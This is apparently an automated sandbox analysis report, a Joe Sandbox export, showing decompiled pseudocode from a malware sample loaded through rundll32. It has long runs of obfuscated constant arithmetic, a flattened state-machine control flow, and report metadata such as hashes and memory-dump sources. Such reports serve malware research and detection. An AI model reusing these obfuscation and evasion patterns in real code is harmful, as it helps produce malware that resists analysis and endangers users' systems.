				_v360 = _v360 / _t778;
				_t779 = 0x66;
				_v360 = _v360 / _t779;
				_v360 = _v360 ^ 0x0006bc1c;
				_v288 = 0xb89ddb;
				_t780 = 0x5c;
				_v288 = _v288 * 0x7b;
				_v288 = _v288 + 0x220a;
				_v288 = _v288 ^ 0x58b2320e;
				_v108 = 0x352a49;
				_v108 = _v108 | 0x42677ea4;
				_v108 = _v108 ^ 0x427d3f06;
				_v332 = 0x1123f9;
				_v332 = _v332 + 0xfffffbdd;
				_v332 = _v332 + 0xffff8b7f;
				_v332 = _v332 | 0xcf6269e1;
				_v332 = _v332 ^ 0xcf7a63e7;
				_v192 = 0x15ba5c;
				_v192 = _v192 + 0xffff7d63;
				_v192 = _v192 ^ 0x0011de47;
				_v204 = 0xd88287;
				_v204 = _v204 >> 1;
				_v204 = _v204 ^ 0x006fcfd9;
				_v308 = 0x394063;
				_v308 = _v308 | 0x23438f89;
				_v308 = _v308 ^ 0x95557e79;
				_v308 = _v308 ^ 0xb625da34;
				_v260 = 0x6632ca;
				_v260 = _v260 << 0xc;
				_v260 = _v260 / _t780;
				_v260 = _v260 ^ 0x011a1b64;
				_v316 = 0x1ead1d;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xe;
				_v316 = _v316 ^ 0x000acc6a;
				_v388 = 0xc01c7d;
				_v388 = _v388 >> 9;
				_v388 = _v388 | 0xa159bc3f;
				_v388 = _v388 ^ 0x1058b9c4;
				_v388 = _v388 ^ 0xb10bd724;
				_v256 = 0x2459a9;
				_v256 = _v256 + 0xffff58c0;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000386a3;
				_v340 = 0xa38d0b;
				_t781 = 0x78;
				_v340 = _v340 / _t781;
				_v340 = _v340 ^ 0x3e3bd45c;
				_v340 = _v340 + 0xf3c0;
				_v340 = _v340 ^ 0x3e3a819a;
				_v380 = 0x2dd945;
				_v380 = _v380 << 4;
				_v380 = _v380 + 0xffffb7c2;
				_v380 = _v380 << 6;
				_v380 = _v380 ^ 0xb75574a7;
				_v272 = 0xf6939e;
				_v272 = _v272 | 0x851c2f86;
				_v272 = _v272 + 0xffff0412;
				_v272 = _v272 ^ 0x85fd1a3b;
				_v188 = 0x2c17e;
				_v188 = _v188 >> 3;
				_v188 = _v188 ^ 0x000c5ae0;
				_v280 = 0xf08b81;
				_v280 = _v280 | 0x75266007;
				_v280 = _v280 ^ 0xc75f894a;
				_v280 = _v280 ^ 0xb2a4e63e;
				_v372 = 0x6f48a0;
				_v372 = _v372 << 0xa;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 | 0x5e122b7b;
				_v372 = _v372 ^ 0x5e16ce05;
				_v184 = 0x747075;
				_v184 = _v184 + 0xcea0;
				_v184 = _v184 ^ 0x007a5d3b;
				_v128 = 0x4ebeca;
				_v128 = _v128 + 0xffffee54;
				_v128 = _v128 ^ 0x004a846f;
				_v120 = 0xe78fe5;
				_t868 = 0x80c65ec;
				_v120 = _v120 + 0xffff4f7b;
				_t864 = 0xf9e92c1;
				_v120 = _v120 ^ 0x00e2ece2;
				_v276 = 0xe2917e;
				_v276 = _v276 << 6;
				_v276 = _v276 + 0xffff0dfb;
				_v276 = _v276 ^ 0x38a72339;
				_v176 = 0x1ec236;
				_v176 = _v176 ^ 0x7af5486d;
				_v176 = _v176 ^ 0x7aeb8f45;
				_v244 = 0x4d92e1;
				_t782 = 0x5f;
				_v88 = 0x20;
				_v244 = _v244 * 0x4a;
				_v244 = _v244 | 0x7c3f7c28;
				_v244 = _v244 ^ 0x7e7c1ac2;
				_v284 = 0xc8aa60;
				_v284 = _v284 + 0x32b9;
				_v284 = _v284 + 0xffff127a;
				_v284 = _v284 ^ 0x00c1b775;
				_v228 = 0x32f957;
				_v228 = _v228 << 0xa;
				_v228 = _v228 ^ 0xe304a089;
				_v228 = _v228 ^ 0x28edcf32;
				_v364 = 0x1a55e7;
				_v364 = _v364 * 0x68;
				_v364 = _v364 * 0x36;
				_v364 = _v364 ^ 0xa842ca33;
				_v364 = _v364 ^ 0xe9f59c27;
				_v168 = 0x34b570;
				_v168 = _v168 | 0x6b6928c5;
				_v168 = _v168 ^ 0x6b739674;
				_v104 = 0x8a8082;
				_v104 = _v104 * 0x3f;
				_v104 = _v104 ^ 0x2214377a;
				_v212 = 0x18307b;
				_v212 = _v212 ^ 0x4b6e1055;
				_v212 = _v212 ^ 0x41119872;
				_v212 = _v212 ^ 0x0a6c434c;
				_v132 = 0x8b3f3c;
				_v132 = _v132 << 2;
				_v132 = _v132 ^ 0x022c35f2;
				_v328 = 0x314aa5;
				_v328 = _v328 | 0xbabb419f;
				_v328 = _v328 / _t782;
				_v328 = _v328 + 0xe73f;
				_v328 = _v328 ^ 0x01f1132e;
				_v140 = 0x403514;
				_v140 = _v140 + 0xffff4e06;
				_v140 = _v140 ^ 0x0039264a;
				while(1) {
					L1:
					_t783 = 0xf0ee26a;
					_t842 = 0xbf4f028;
					_t716 = 0xc1f5c56;
					do {
						while(1) {
							L2:
							_t878 = _t766 - _t716;
							if(_t878 > 0) {
								break;
							}
							if(_t878 == 0) {
								_push(_v160);
								_push(_v112);
								_t732 = E0034DCF7(_v396, 0x331884, __eflags);
								_push(_v392);
								_t866 = _t732;
								_push(_v384);
								_t733 = E0034DCF7(_v152, 0x331924, __eflags);
								_v76 = _v124;
								_t735 = E0033CB52(_v376, _t866, _v268, _v116, _v144);
								_v68 = _v68 & 0x00000000;
								_v72 = _t866;
								_v80 = 2 + _t735 * 2;
								_v60 =  &_v80;
								_v92 = _v88;
								_v64 = 1;
								_t741 = E00338D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
								_t875 =  &(_t875[0x11]);
								__eflags = _t741 - _v304;
								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
								E0033A8B0(_v296, _t866, _v196);
								E0033A8B0(_v360, _t733, _v288);
								_t864 = 0xf9e92c1;
								goto L24;
							} else {
								if(_t766 == 0xdec32e) {
									_t746 =  *0x353dfc; // 0x0
									E00348519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
									_t766 = _t864;
									while(1) {
										L1:
										_t783 = 0xf0ee26a;
										_t842 = 0xbf4f028;
										_t716 = 0xc1f5c56;
										goto L2;
									}
								} else {
									if(_t766 == 0x41de8e2) {
										_t766 = 0xe078043;
										continue;
									} else {
										if(_t766 == _t868) {
											_push(_v128);
											_push(_v184);
											_t871 = E0034DCF7(_v372, 0x331904, __eflags);
											_t585 =  &_v300; // 0x3e0de8e7
											_v44 =  *_t585;
											_v40 = _v252;
											_pop(_t807);
											_v36 = _v100;
											_t752 =  *0x353dfc; // 0x0
											_t754 =  *0x353dfc; // 0x0
											_t755 =  *0x353dfc; // 0x0
											_t757 = E0034D84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
											_t875 =  &(_t875[0xd]);
											__eflags = _t757 - _v348;
											if(_t757 != _v348) {
												_t766 = 0xdec32e;
											} else {
												_t766 = _t864;
												_t873 = 1;
											}
											E0033A8B0(_v364, _t871, _v168);
											goto L24;
										} else {
											_t882 = _t766 - _t842;
											if(_t766 == _t842) {
												_push(_v192);
												_push(_v332);
												_t759 = E0034DCF7(_v108, 0x3318b4, _t882);
												_pop(_t812);
												_t760 =  *0x353dfc; // 0x0
												E00350B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
												_t766 =  ==  ? 0xf0ee26a : _t864;
												E0033A8B0(_v340, _t759, _v380);
												L23:
												_t875 =  &(_t875[0xb]);
												L24:
												_t842 = 0xbf4f028;
												_t783 = 0xf0ee26a;
												_t868 = 0x80c65ec;
												_t716 = 0xc1f5c56;
											}
										}
										goto L25;
									}
								}
							}
							L20:
							return _t873;
						}
						__eflags = _t766 - 0xe078043;
						if(__eflags == 0) {
							_push(_v264);
							_push(_v352);
							_t717 = E0034DCF7(_v324, 0x3318e4, __eflags);
							_push(_v248);
							_push(_v180);
							_t718 = E0034DCF7(_v240, 0x331814, __eflags);
							_t665 =  &_v172; // 0x39264a
							__eflags = E00339462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
							E0033A8B0(_v216, _t717, _v224);
							E0033A8B0(_v148, _t718, _v156);
							_t864 = 0xf9e92c1;
							goto L23;
                                                                                                                    						} else {
                                                                                                                    							__eflags = _t766 - _t783;
                                                                                                                    							if(_t766 == _t783) {
                                                                                                                    								_t848 =  *0x353dfc; // 0x0
                                                                                                                    								_push(_t783);
                                                                                                                    								_push(_t783);
                                                                                                                    								_t792 = E00337FF2( *((intOrPtr*)(_t848 + 0x54)));
                                                                                                                    								_t730 =  *0x353dfc; // 0x0
                                                                                                                    								__eflags = _t792;
                                                                                                                    								_t766 =  !=  ? _t868 : _t864;
                                                                                                                    								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
                                                                                                                    								goto L1;
                                                                                                                    							} else {
                                                                                                                    								__eflags = _t766 - _t864;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									goto L25;
                                                                                                                    								} else {
                                                                                                                    									_t646 =  &_v140; // 0x39264a
                                                                                                                    									E0033957D(_v96, _v132, _v328, _v208,  *_t646);
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						goto L20;
                                                                                                                    						L25:
                                                                                                                    					} while (_t766 != 0x1d0239b);
                                                                                                                    					goto L20;
                                                                                                                    				}
                                                                                                                    			}







































































































































                                                                                                                    0x003333db
                                                                                                                    0x003333e0
                                                                                                                    0x003333e8
                                                                                                                    0x003333f0
                                                                                                                    0x003333f8
                                                                                                                    0x00333403
                                                                                                                    0x0033340e
                                                                                                                    0x00333416
                                                                                                                    0x00333421
                                                                                                                    0x0033342d
                                                                                                                    0x00333430
                                                                                                                    0x00333434
                                                                                                                    0x0033343c
                                                                                                                    0x00333444
                                                                                                                    0x0033344c
                                                                                                                    0x00333454
                                                                                                                    0x00333459
                                                                                                                    0x00333461
                                                                                                                    0x00333466
                                                                                                                    0x0033346e
                                                                                                                    0x00333479
                                                                                                                    0x00333484
                                                                                                                    0x0033348f
                                                                                                                    0x0033349a
                                                                                                                    0x003334a5
                                                                                                                    0x003334ad
                                                                                                                    0x003334b8
                                                                                                                    0x003334c3
                                                                                                                    0x003334ce
                                                                                                                    0x003334d9
                                                                                                                    0x003334e4
                                                                                                                    0x003334ec
                                                                                                                    0x003334f1
                                                                                                                    0x003334f6
                                                                                                                    0x003334fe
                                                                                                                    0x00333506
                                                                                                                    0x00333511
                                                                                                                    0x0033351c
                                                                                                                    0x00333527
                                                                                                                    0x00333532
                                                                                                                    0x0033353d
                                                                                                                    0x0033354a
                                                                                                                    0x00333555
                                                                                                                    0x0033355a
                                                                                                                    0x00333565
                                                                                                                    0x0033356a
                                                                                                                    0x00333575
                                                                                                                    0x00333580
                                                                                                                    0x00333588
                                                                                                                    0x00333593
                                                                                                                    0x0033359e
                                                                                                                    0x003335a9
                                                                                                                    0x003335b4
                                                                                                                    0x003335bf
                                                                                                                    0x003335d4
                                                                                                                    0x003335d5
                                                                                                                    0x003335e0
                                                                                                                    0x003335e7
                                                                                                                    0x003335f2
                                                                                                                    0x003335fd
                                                                                                                    0x00333608
                                                                                                                    0x00333613
                                                                                                                    0x0033361e
                                                                                                                    0x00333629
                                                                                                                    0x00333634
                                                                                                                    0x0033363c
                                                                                                                    0x00333647
                                                                                                                    0x00333652
                                                                                                                    0x0033365f
                                                                                                                    0x00333668
                                                                                                                    0x0033366c
                                                                                                                    0x00333674
                                                                                                                    0x0033367c
                                                                                                                    0x00333687
                                                                                                                    0x00333692
                                                                                                                    0x0033369d
                                                                                                                    0x003336b0
                                                                                                                    0x003336b7
                                                                                                                    0x003336c2
                                                                                                                    0x003336cd
                                                                                                                    0x003336d8
                                                                                                                    0x003336e3
                                                                                                                    0x003336ee
                                                                                                                    0x003336f9
                                                                                                                    0x00333701
                                                                                                                    0x0033370c
                                                                                                                    0x00333714
                                                                                                                    0x00333722
                                                                                                                    0x00333726
                                                                                                                    0x0033372e
                                                                                                                    0x00333736
                                                                                                                    0x00333741
                                                                                                                    0x0033374c
                                                                                                                    0x00333757
                                                                                                                    0x00333757
                                                                                                                    0x00333757
                                                                                                                    0x0033375c
                                                                                                                    0x00333761
                                                                                                                    0x00333766
                                                                                                                    0x00333766
                                                                                                                    0x00333766
                                                                                                                    0x00333766
                                                                                                                    0x00333768
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033376e
                                                                                                                    0x0033392a
                                                                                                                    0x00333936
                                                                                                                    0x00333941
                                                                                                                    0x00333946
                                                                                                                    0x0033394f
                                                                                                                    0x00333951
                                                                                                                    0x0033395c
                                                                                                                    0x00333973
                                                                                                                    0x0033398c
                                                                                                                    0x00333998
                                                                                                                    0x003339b5
                                                                                                                    0x003339c3
                                                                                                                    0x003339d1
                                                                                                                    0x003339e0
                                                                                                                    0x003339fd
                                                                                                                    0x00333a1c
                                                                                                                    0x00333a23
                                                                                                                    0x00333a2f
                                                                                                                    0x00333a43
                                                                                                                    0x00333a46
                                                                                                                    0x00333a58
                                                                                                                    0x00333a5f
                                                                                                                    0x00000000
                                                                                                                    0x00333774
                                                                                                                    0x0033377a
                                                                                                                    0x00333907
                                                                                                                    0x0033391d
                                                                                                                    0x00333923
                                                                                                                    0x00333757
                                                                                                                    0x00333757
                                                                                                                    0x00333757
                                                                                                                    0x0033375c
                                                                                                                    0x00333761
                                                                                                                    0x00000000
                                                                                                                    0x00333761
                                                                                                                    0x00333780
                                                                                                                    0x00333786
                                                                                                                    0x003338fd
                                                                                                                    0x00000000
                                                                                                                    0x0033378c
                                                                                                                    0x0033378e
                                                                                                                    0x00333829
                                                                                                                    0x00333835
                                                                                                                    0x00333845
                                                                                                                    0x00333847
                                                                                                                    0x0033384b
                                                                                                                    0x0033385a
                                                                                                                    0x00333868
                                                                                                                    0x00333869
                                                                                                                    0x00333870
                                                                                                                    0x003338a5
                                                                                                                    0x003338bb
                                                                                                                    0x003338cb
                                                                                                                    0x003338d0
                                                                                                                    0x003338d3
                                                                                                                    0x003338d7
                                                                                                                    0x003338e0
                                                                                                                    0x003338d9
                                                                                                                    0x003338db
                                                                                                                    0x003338dd
                                                                                                                    0x003338dd
                                                                                                                    0x003338f2
                                                                                                                    0x00000000
                                                                                                                    0x00333794
                                                                                                                    0x00333794
                                                                                                                    0x00333796
                                                                                                                    0x0033379c
                                                                                                                    0x003337a8
                                                                                                                    0x003337b3
                                                                                                                    0x003337b9
                                                                                                                    0x003337e4
                                                                                                                    0x003337fe
                                                                                                                    0x0033381c
                                                                                                                    0x0033381f
                                                                                                                    0x00333b98
                                                                                                                    0x00333b98
                                                                                                                    0x00333b9b
                                                                                                                    0x00333b9b
                                                                                                                    0x00333ba0
                                                                                                                    0x00333ba5
                                                                                                                    0x00333baa
                                                                                                                    0x00333baa
                                                                                                                    0x00333796
                                                                                                                    0x00000000
                                                                                                                    0x0033378e
                                                                                                                    0x00333786
                                                                                                                    0x0033377a
                                                                                                                    0x00333aa7
                                                                                                                    0x00333ab1
                                                                                                                    0x00333ab1
                                                                                                                    0x00333a69
                                                                                                                    0x00333a6f
                                                                                                                    0x00333aef
                                                                                                                    0x00333afb
                                                                                                                    0x00333b03
                                                                                                                    0x00333b08
                                                                                                                    0x00333b16
                                                                                                                    0x00333b24
                                                                                                                    0x00333b3e
                                                                                                                    0x00333b68
                                                                                                                    0x00333b76
                                                                                                                    0x00333b79
                                                                                                                    0x00333b8e
                                                                                                                    0x00333b93
                                                                                                                    0x00000000
                                                                                                                    0x00333a71
                                                                                                                    0x00333a71
                                                                                                                    0x00333a73
                                                                                                                    0x00333ac7
                                                                                                                    0x00333acd
                                                                                                                    0x00333ace
                                                                                                                    0x00333ad9
                                                                                                                    0x00333add
                                                                                                                    0x00333ae2

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: "$ $(|?|$;]z$='mm$?$I*5$J&9$J&9$LCl$c@9$lT&$t1 $Y($>
                                                                                                                    • API String ID: 0-1427316221
                                                                                                                    • Opcode ID: 5415bb0c310e63ecd5831974d4a5ef955fe3d754476a32c66de457ae4e80b049
                                                                                                                    • Instruction ID: 526c3b879ea09b04c5c5d25cf0576b1aa4d24eef5b8401be86f9c5ad17f20581
                                                                                                                    • Opcode Fuzzy Hash: 5415bb0c310e63ecd5831974d4a5ef955fe3d754476a32c66de457ae4e80b049
                                                                                                                    • Instruction Fuzzy Hash: 7672EE715093818FD3B9CF25C58AB8BBBE1FBC5304F10891DE1DA9A260DBB59949CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E0034AE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                    				intOrPtr _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				char _v12;
                                                                                                                    				char _v16;
                                                                                                                    				intOrPtr _v20;
                                                                                                                    				intOrPtr _v24;
                                                                                                                    				char _v28;
                                                                                                                    				char _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				unsigned int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				signed int _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				signed int _v160;
                                                                                                                    				signed int _v164;
                                                                                                                    				signed int _v168;
                                                                                                                    				signed int _v172;
                                                                                                                    				signed int _v176;
                                                                                                                    				signed int _v180;
                                                                                                                    				signed int _v184;
                                                                                                                    				signed int _v188;
                                                                                                                    				signed int _v192;
                                                                                                                    				signed int _v196;
                                                                                                                    				signed int _v200;
                                                                                                                    				signed int _v204;
                                                                                                                    				signed int _v208;
                                                                                                                    				signed int _v212;
                                                                                                                    				signed int _v216;
                                                                                                                    				signed int _v220;
                                                                                                                    				signed int _v224;
                                                                                                                    				signed int _v228;
                                                                                                                    				signed int _v232;
                                                                                                                    				signed int _v236;
                                                                                                                    				signed int _v240;
                                                                                                                    				signed int _v244;
                                                                                                                    				signed int _v248;
                                                                                                                    				signed int _v252;
                                                                                                                    				signed int _v256;
                                                                                                                    				signed int _v260;
                                                                                                                    				signed int _v264;
                                                                                                                    				signed int _v268;
                                                                                                                    				signed int _v272;
                                                                                                                    				void* _t537;
                                                                                                                    				void* _t566;
                                                                                                                    				void* _t567;
                                                                                                                    				intOrPtr _t573;
                                                                                                                    				void* _t575;
                                                                                                                    				void* _t577;
                                                                                                                    				void* _t585;
                                                                                                                    				void* _t588;
                                                                                                                    				void* _t594;
                                                                                                                    				void* _t596;
                                                                                                                    				signed int _t603;
                                                                                                                    				signed int _t604;
                                                                                                                    				signed int _t605;
                                                                                                                    				signed int _t606;
                                                                                                                    				signed int _t607;
                                                                                                                    				signed int _t608;
                                                                                                                    				signed int _t609;
                                                                                                                    				signed int _t610;
                                                                                                                    				void* _t611;
                                                                                                                    				void* _t633;
                                                                                                                    				void* _t660;
                                                                                                                    				void* _t675;
                                                                                                                    				intOrPtr _t677;
                                                                                                                    				intOrPtr _t680;
                                                                                                                    				signed int* _t682;
                                                                                                                    				void* _t685;
                                                                                                                    
                                                                                                                    				_push(_a20);
                                                                                                                    				_t677 = __edx;
                                                                                                                    				_push(_a16);
                                                                                                                    				_v24 = __edx;
                                                                                                                    				_push(0x20);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t537);
                                                                                                                    				_v8 = 0x673696;
                                                                                                                    				_t680 = 0;
                                                                                                                    				_v4 = 0;
                                                                                                                    				_t682 =  &(( &_v272)[7]);
                                                                                                                    				_v144 = 0xf00d33;
                                                                                                                    				_v144 = _v144 | 0x228e8b2e;
                                                                                                                    				_t596 = 0x1d3710;
                                                                                                                    				_v144 = _v144 >> 8;
                                                                                                                    				_v144 = _v144 ^ 0x0022fe8f;
                                                                                                                    				_v244 = 0xde08aa;
                                                                                                                    				_t603 = 0x17;
                                                                                                                    				_v244 = _v244 / _t603;
                                                                                                                    				_v244 = _v244 + 0xffff54ea;
                                                                                                                    				_v244 = _v244 << 0xa;
                                                                                                                    				_v244 = _v244 ^ 0x23f0fc00;
                                                                                                                    				_v224 = 0x36cb35;
                                                                                                                    				_v224 = _v224 | 0xc39aec51;
                                                                                                                    				_v224 = _v224 + 0x9146;
                                                                                                                    				_t604 = 0x62;
                                                                                                                    				_v224 = _v224 * 0x70;
                                                                                                                    				_v224 = _v224 ^ 0xa3c851d0;
                                                                                                                    				_v116 = 0xf2e64b;
                                                                                                                    				_v116 = _v116 << 5;
                                                                                                                    				_v116 = _v116 ^ 0x1e5cc960;
                                                                                                                    				_v248 = 0x2b7d5f;
                                                                                                                    				_t43 =  &_v248; // 0x2b7d5f
                                                                                                                    				_v248 =  *_t43 * 0x53;
                                                                                                                    				_v248 = _v248 + 0x8561;
                                                                                                                    				_v248 = _v248 | 0xae4dc352;
                                                                                                                    				_v248 = _v248 ^ 0xae5feb7e;
                                                                                                                    				_v80 = 0xe6036b;
                                                                                                                    				_v80 = _v80 * 0xb;
                                                                                                                    				_v80 = _v80 ^ 0x09e22599;
                                                                                                                    				_v240 = 0x5b8b4f;
                                                                                                                    				_v240 = _v240 + 0xffffe1e0;
                                                                                                                    				_v240 = _v240 ^ 0xb7b7812a;
                                                                                                                    				_v240 = _v240 + 0xffff41e0;
                                                                                                                    				_v240 = _v240 ^ 0xb7ec2de5;
                                                                                                                    				_v232 = 0xf81ab6;
                                                                                                                    				_v232 = _v232 ^ 0xa56b9217;
                                                                                                                    				_v232 = _v232 | 0x431a55e8;
                                                                                                                    				_v232 = _v232 << 7;
                                                                                                                    				_v232 = _v232 ^ 0xcdeef480;
                                                                                                                    				_v184 = 0xddfe73;
                                                                                                                    				_v184 = _v184 * 0x26;
                                                                                                                    				_v184 = _v184 << 8;
                                                                                                                    				_v184 = _v184 ^ 0xf3c51200;
                                                                                                                    				_v120 = 0x644fb5;
                                                                                                                    				_v120 = _v120 >> 6;
                                                                                                                    				_v120 = _v120 / _t604;
                                                                                                                    				_v120 = _v120 ^ 0x00000418;
                                                                                                                    				_v60 = 0xc6ff9f;
                                                                                                                    				_v60 = _v60 ^ 0x0d96ce7d;
                                                                                                                    				_v60 = _v60 ^ 0x0d5031e2;
                                                                                                                    				_v204 = 0xeedb74;
                                                                                                                    				_v204 = _v204 >> 0xb;
                                                                                                                    				_v204 = _v204 >> 0xa;
                                                                                                                    				_v204 = _v204 | 0xba569879;
                                                                                                                    				_v204 = _v204 ^ 0xba56987f;
                                                                                                                    				_v268 = 0x9a0618;
                                                                                                                    				_v268 = _v268 ^ 0x10270239;
                                                                                                                    				_v268 = _v268 ^ 0x733075d3;
                                                                                                                    				_t605 = 0x16;
                                                                                                                    				_v268 = _v268 / _t605;
                                                                                                                    				_v268 = _v268 ^ 0x04865c22;
                                                                                                                    				_v160 = 0x655fad;
                                                                                                                    				_v160 = _v160 >> 3;
                                                                                                                    				_v160 = _v160 >> 4;
                                                                                                                    				_v160 = _v160 ^ 0x0009a8dc;
                                                                                                                    				_v272 = 0x9202;
                                                                                                                    				_v272 = _v272 | 0xfb135803;
                                                                                                                    				_t606 = 0x41;
                                                                                                                    				_v272 = _v272 * 0x2c;
                                                                                                                    				_v272 = _v272 << 1;
                                                                                                                    				_v272 = _v272 ^ 0x4ed07035;
                                                                                                                    				_v100 = 0x536289;
                                                                                                                    				_v100 = _v100 << 9;
                                                                                                                    				_v100 = _v100 ^ 0xa6cd28cf;
                                                                                                                    				_v108 = 0xf021d8;
                                                                                                                    				_v108 = _v108 ^ 0x8f8b6ed2;
                                                                                                                    				_v108 = _v108 ^ 0x8f701d8c;
                                                                                                                    				_v152 = 0xcba027;
                                                                                                                    				_v152 = _v152 ^ 0xce0cd109;
                                                                                                                    				_v152 = _v152 | 0x7dfb06f6;
                                                                                                                    				_v152 = _v152 ^ 0xfff88f5e;
                                                                                                                    				_v252 = 0xf09c41;
                                                                                                                    				_v252 = _v252 + 0x8e2a;
                                                                                                                    				_v252 = _v252 << 3;
                                                                                                                    				_v252 = _v252 | 0xdb831f2c;
                                                                                                                    				_v252 = _v252 ^ 0xdf846234;
                                                                                                                    				_v260 = 0x3d692f;
                                                                                                                    				_v260 = _v260 << 2;
                                                                                                                    				_v260 = _v260 | 0xbfb4a027;
                                                                                                                    				_v260 = _v260 + 0x643;
                                                                                                                    				_v260 = _v260 ^ 0xbffb0fde;
                                                                                                                    				_v92 = 0x80bca7;
                                                                                                                    				_v92 = _v92 >> 0xa;
                                                                                                                    				_v92 = _v92 ^ 0x00038c1c;
                                                                                                                    				_v228 = 0xbbbc43;
                                                                                                                    				_v228 = _v228 | 0x61282476;
                                                                                                                    				_v228 = _v228 + 0xffff6ee2;
                                                                                                                    				_v228 = _v228 * 0x69;
                                                                                                                    				_v228 = _v228 ^ 0x15ccd750;
                                                                                                                    				_v236 = 0xc2062f;
                                                                                                                    				_v236 = _v236 | 0xf7f3ef67;
                                                                                                                    				_v236 = _v236 * 0x5c;
                                                                                                                    				_v236 = _v236 ^ 0x1ba01eed;
                                                                                                                    				_v128 = 0xa773bc;
                                                                                                                    				_v128 = _v128 << 0x10;
                                                                                                                    				_v128 = _v128 | 0xe162daa5;
                                                                                                                    				_v128 = _v128 ^ 0xf3f36b57;
                                                                                                                    				_v136 = 0x3287f3;
                                                                                                                    				_v136 = _v136 / _t606;
                                                                                                                    				_v136 = _v136 >> 9;
                                                                                                                    				_v136 = _v136 ^ 0x000c37d1;
                                                                                                                    				_v104 = 0x8d5fef;
                                                                                                                    				_v104 = _v104 + 0xffff56ea;
                                                                                                                    				_v104 = _v104 ^ 0x008f942b;
                                                                                                                    				_v44 = 0xd6bac6;
                                                                                                                    				_v44 = _v44 * 0x7f;
                                                                                                                    				_v44 = _v44 ^ 0x6a80c639;
                                                                                                                    				_v148 = 0xa4165e;
                                                                                                                    				_v148 = _v148 * 0x13;
                                                                                                                    				_v148 = _v148 | 0x84e82f79;
                                                                                                                    				_v148 = _v148 ^ 0x8cef9599;
                                                                                                                    				_v96 = 0xfc4916;
                                                                                                                    				_v96 = _v96 + 0xffff0795;
                                                                                                                    				_v96 = _v96 ^ 0x00f5cebb;
                                                                                                                    				_v132 = 0xd5d7c2;
                                                                                                                    				_v132 = _v132 >> 0x10;
                                                                                                                    				_v132 = _v132 << 0xd;
                                                                                                                    				_v132 = _v132 ^ 0x0010cc3c;
                                                                                                                    				_v264 = 0xf6e8cb;
                                                                                                                    				_v264 = _v264 + 0x6576;
                                                                                                                    				_v264 = _v264 + 0x7b15;
                                                                                                                    				_v264 = _v264 + 0x6b9c;
                                                                                                                    				_v264 = _v264 ^ 0x00fe3ec7;
                                                                                                                    				_v208 = 0x3a8541;
                                                                                                                    				_v208 = _v208 | 0x57459f57;
                                                                                                                    				_v208 = _v208 ^ 0x66631a8c;
                                                                                                                    				_v208 = _v208 | 0x178bfabb;
                                                                                                                    				_v208 = _v208 ^ 0x379a2cb6;
                                                                                                                    				_v56 = 0x33c5e6;
                                                                                                                    				_v56 = _v56 + 0x441;
                                                                                                                    				_v56 = _v56 ^ 0x0035e6a0;
                                                                                                                    				_v172 = 0x2bd4df;
                                                                                                                    				_v172 = _v172 + 0xda1f;
                                                                                                                    				_v172 = _v172 + 0x8171;
                                                                                                                    				_v172 = _v172 ^ 0x002cd084;
                                                                                                                    				_v48 = 0x796d26;
                                                                                                                    				_v48 = _v48 + 0xffff3152;
                                                                                                                    				_v48 = _v48 ^ 0x00766b67;
                                                                                                                    				_v88 = 0xfc738c;
                                                                                                                    				_v88 = _v88 << 0xe;
                                                                                                                    				_v88 = _v88 ^ 0x1ce8da45;
                                                                                                                    				_v140 = 0x79fdd0;
                                                                                                                    				_v140 = _v140 >> 0xe;
                                                                                                                    				_v140 = _v140 * 0x78;
                                                                                                                    				_v140 = _v140 ^ 0x000f2c53;
                                                                                                                    				_v64 = 0xd0b1f6;
